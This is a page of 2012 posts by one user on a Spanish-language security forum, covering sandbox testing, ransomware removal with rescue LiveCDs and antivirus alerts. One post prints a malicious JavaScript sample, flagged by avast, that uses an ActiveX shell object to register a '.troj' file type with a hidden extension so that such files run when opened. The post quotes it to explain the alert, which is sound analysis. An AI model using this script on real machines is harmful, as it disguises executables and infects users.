últimos mensajes de: r32

Mostrar Mensajes
Páginas: 1 ... 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 [111] 112 113 114 115 116 117 118 119 120 121 122

1101	Seguridad Informática / Seguridad / Re: Buster Sandbox Analyzer	en: 22 Abril 2012, 12:17 pm
Lo probé en una virtual con la última versión que encontré del Spy-net, si que decir que la sandbox no estaba actualizada, no utilizo la versión full, solo la de prueba. Voy a probarlo de nuevo, y dejaré el server con la misma configuración y la sandbox actualizada, de todas formas te subo el server y lo pruebas tu mismo. Saludos.

1102	Seguridad Informática / Seguridad / Re: Buster Sandbox Analyzer	en: 22 Abril 2012, 12:07 pm
Hola Buster, no lo decía en el sentido de que te hubiesen ayudado o hecho el trabajo, me refería a lo que has comentado aunque parece me quedó diferente, bueno eso. Probando... Una cosa, haciendo pruebas con un trojan (spynet) aunque un pelín viejo salta la sandbox e infecta la máquina anfitrión, estoy haciendo pruebas con tu tool y otros troyanos a ver como se comporta. Saludos.

1103	Foros Generales / Sugerencias y dudas sobre el Foro / Re: sugerencia	en: 22 Abril 2012, 11:35 am
Hola Golo12, supongo se podría hacer (lo he visto en otros foros), esto lo han de decidir los administradores, pero en si ya se publica la fecha en la que se creó el tema, lo único que hay usuarios que no miran cuando fue publicada la última respuesta, postean y luego resulta que el post lleva "cerrado" X años... Incluso si se modifica un post queda grabada la fecha y hora de la corrección. Creo que es mas cuestión de fijarse pero bueno. Saludos.

1104

Seguridad Informática / Seguridad / Re: avast! infection detected en subforo analisis y diseño de malware

en: 22 Abril 2012, 08:45 am

Hola xiruko como puedes ver en la alerta es por un script del siguiente code:

Código:

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKCR\\.troj\\", "trojfile");
Shl.RegWrite ("HKCR\\trojfile\\", "Documento de texto");
Shl.RegWrite ("HKCR\\trojfile\\NeverShowExt", "");
Shl.RegWrite ("HKCR\\trojfile\\shell\\open\\command\\", "%1 %*");

}
catch(e) {}
}
catch(e) {}
}

setTimeout("f()", 1000);

</script>

Pegas ese code en un txt lo nombras como "ejemplo.js" y lo subes a analizar.
Aquí tienes el script analizado en Jotti:

Link: http://virusscan.jotti.org/es/scanresult/1e34f284e7944cbc9a58fe2a52a9b38697aaced4

2012-04-21 JS:Seeker-E

Saludos y gracias por el aviso !!!

1105	Seguridad Informática / Seguridad / Re: Buster Sandbox Analyzer	en: 17 Abril 2012, 00:00 am
He estado leyendo el About y tuviste apoyo de gente muy conocida en este campo, me alegro. Tienes provisto incluir la traducción al español? Aunque todavía esta en proyecto y al final no se si se lanzará, incluimos tu herramienta en un AIO de análisis de Malware (All in one - Todo en uno). Si se llevara a cabo tenemos tu permiso ¿no?... Saludos, sigue así buena tool.

1106	Seguridad Informática / Seguridad / Re: Problema	en: 16 Abril 2012, 23:38 pm
Sinceramente, aunque no soy mod ni nada creo que lo de los comentarios se va a hacer caso omiso o en su lugar utilizarlo de papel de water, lo mismo da Citar team es el Bluesky el Pr0xxx0r $:-\$ Me ha empezado a entrar miedo, no se, pedazo de juanker de hotmail, chat de Ares y alguna cosa mas, pero que vamos... No digo nada mas, un saludo.

1107	Seguridad Informática / Seguridad / Re: Pc bloqueado por virus?, me exige un pago.	en: 16 Abril 2012, 23:24 pm
Citar Hasta hace poco no he tenido problemas , pero llevo un par de meses que me entran por todos lados. ¿como puedo protegerme mejor?. Revisaste tener actualizados los plugins del navegador (flash, reader, java)? Por ahí te pueden entrar bastantes, tener el Sistema Operativo actualizado tambien te ayudará... Probaste cambiar de Firewall, hay varios y gratuitos, se mejoró algo el de Windows pero los hay mejores. Añade a tus herramientas de desinfección "Malwarebytes", funciona bastante bien. Saludos.

1108	Seguridad Informática / Seguridad / Re: Vuelve el troyano que se hace pasar por la policía: Cómo protegerse (de verdad)	en: 16 Abril 2012, 23:16 pm
Para los que tengan el problema de que no tiene lectora de CD, pueden usar el programa UNetbootin, seguir las instrucciones del siguiente documento: http://ns2.elhacker.net/aio/Instrucciones%20para%20grabar%20los%20LiveCD%20en%20una%20unidad%20USB.pdf

1109	Seguridad Informática / Seguridad / Re: Vuelve el troyano que se hace pasar por la policía: Cómo protegerse (de verdad)	en: 14 Abril 2012, 22:03 pm
Inicia desde el CD un LiveCD antimalware, más arriba aconsejan el de Avira, el de Kaspersky tambien elimina ese Ramsonware... LiveCD Avira: http://dlpro.antivir.com/package/rescue_system/common/en/rescue_system-common-en.iso LiveCd Kaspersky: http://rescuedisk.kaspersky-labs.com/rescuedisk/updatable/kav_rescue_10.iso Saludos.

1110	Seguridad Informática / Seguridad / Re: rundll32.exe intenta conectarse a 63.97.94.95 puerto 80?	en: 13 Abril 2012, 18:13 pm
Depende de tu ISP puede ser que utilice los servidores de Akamai, creo speedy telefonica lo hacía. Acabo comprobar en mi win7 y el ckecksum es el mismo. Yo no le daría mucha importáncia, notas algo raro en el comportamineto del PC... Saludos.

Páginas: 1 ... 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 [111] 112 113 114 115 116 117 118 119 120 121 122